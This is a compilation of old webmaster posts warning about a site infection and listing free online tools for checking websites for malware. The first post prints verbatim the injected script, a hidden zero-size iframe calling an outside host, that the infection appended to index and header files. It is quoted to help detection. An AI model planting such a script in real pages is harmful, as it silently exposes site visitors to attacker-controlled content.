Check your website for virus attack

Just discovered this by accident. My server files have been infected
with a piece of javascript code that sends the information to a
certain site. This is certainly a first.

How can you check this?
The virus attacks following files on your server:

index.php
index.html
main.php
header.php
footer.php
At the end of these files it will insert the following code:

<script language=javascript>status=location;document.write ('<iframe
src="hххp://online-channels.info/in.cgi?traf" width=0
height=0 frameborder=0 display:none
onLoad="status=defaultStatus;"></iframe>');</script>

What it does?
I can only guess. The code is calling a script on online-channels.info
site. It can be sending traffic information. Maybe it is a first case
of Internet marketing espionage? Or it can be trying to run some
malicious code.

How did it come here?
It can be a security flaw on my hosting server. It can be a security
flaw of the WordPress which is the main script I run on my server.

Whatever way it came, it executed code that scanned through all the
files on my server that match the given names and added that code at
the end.

All created files carry the time stamp 29-06-2008 04:59 which is the
time when the attack occurred

What can I do?
You should check the files on your server for the code. Check
index.php and index.html first as they are most likely to have been
infected.

Warn your friends about it.

Free online website checking services

Some antivirus provides network protection that will check the website
or file is safe or not. Browser add-ons become popular too that will
alert users if the page is bad or not. Most browsers will block any
bad sites or unsafe downloads but you might want to see below online
Services to check if a website is safe or serving malware. Add them in
your bookmark or favorites so the next time you want to visit a site,
you'll get to see first if it's not going to harm your system:

Read more: http://www.brighthub.com/computing/smb-security/articles/31108.aspx#ixzz0aLN7SEVi

•Blacklist Doctor – enter the URL or web address to diagnose a site
•Google Safe Browsing – This is a service by Google. Just enter the
URL at the end of http://google.com/safebrowsing/diagnostic?site=
Example: http://google.com/safebrowsing/diagnostic?site=brighthub.com
or http://google.com/safebrowsing/diagnostic?site=www.brighthub.com
•HpHosts Online – My friend Steven Burn created this service to see if
the site is listed as rogue, malware or phishing site.
••LinkScanner Online – if a site is bad, hiding exploit code or has
been compromised you can use this service too.
•Norton Safe Web – a service by Symantec to check if the site is safe
or not. Links on the bad file but not clickable is listed. Users can
add their review. If a site is not known as good or bad, they will
review to add the rating
•SiteAdvisor – check if the site is safe or have malware
•sURL - Another free service from Steven Burn. You cannot create a URL
redirection if the site is known malware or listed in hpHosts
database.
•Unmask Parasites – check if the site have hidden parasites or
compromised. You can also use the other link, Google as a hidden link
detection tool if the site or IP is being use to spam
•vURL Online - this one will dissect a webpage for a suspect or malicious site.
•Web of Trust (WOT) – see if the site serving malware, phishing,
spyware or rogue sites
Before you download a file, you might want to add the following as
add-on to your browser:

•Dr.Web Link checker – it is available for free. Required browser is
Firefox, Internet Explorer, and Opera. Just right-click a download
link and let Dr.Web check if the file that you want to download is
safe or not.
•Google Safe Browsing - extension for Firefox browser
•Microsoft's Windows Internet Explorer 8 has SmartScreen Filter that
will check if the site is phishing site or if the file you are
downloading is malicious.
Check also my previous article "Extending your browser security: Avoid
internet-based threats"

By using the above services or feature and add-ons while you browse,
you are protecting not only your computer but your private information
because some websites will ask for your login credentials. Better be
safe than sorry!

Read more: http://www.brighthub.com/computing/smb-security/articles/31108.aspx#ixzz0aLNG2id1

Scan or Check Websites for Malware – 4 Free Tools

How to Scan or Check Websites for Malware
It is very difficult for an average webmaster to go through the source
code of each of the web page in detail and find out what is causing
the damage. It is really a difficult task to find the hidden codes and
malicious frames, which are redirecting to some other malicious codes.
There may be lots of hidden and spammy links, which are extremely
difficult to be found.

However, there are a few online tools, which can help you to check
your websites to scan for malware infections.

4 Free Online Tools To Check Malware in Websites
You can use these tools as the primary starting point in your hunt to
find the malicious codes.

PhishTank: PhishTank is a free community site where anyone can submit,
verify, track and share phishing data. PhishTank is operated by
OpenDNS, a company founded in 2005 to improve the Internet through
safer, faster, and smarter DNS.

AVG Online Web Page Scanner: The AVG LinkScanner Drop Zone lets you
check the safety of individual web pages you are about to visit. You
may have received a suspicious link in an e-mail — just copy the URL
(web page address) and drop it into the box below. LinkScanner will
examine the web page in real time to see whether it's hiding any
suspicious downloads.

Google Safe Browsing: And this one comes straight from Google. It is a
handy tool, which allows you to test a website which you think may not
be genuine or distributing malware. In order to check it, you just
need to type the following in your browser address bar -
http://www.google.com/safebrowsing/diagnostic?site=<Your Target
Website Address>. For example, if you want to check this website for
malware, then you can use

http://www.google.com/safebrowsing/diagnostic?site=pcsecurity.com.
In case, you f ind these tools useful, there is yet another tool,
which allows combines all of them into a single website, and you can
use all of them from one place itself. Online Link Scan does the job
perfectly for you. Besides these three utilities, it also checks your
target URL with SiteTruth, which is a tool useful for checking the
authenticity of online businesses.

To Check website is Phishing or Not Online

http://www.phishtank.com/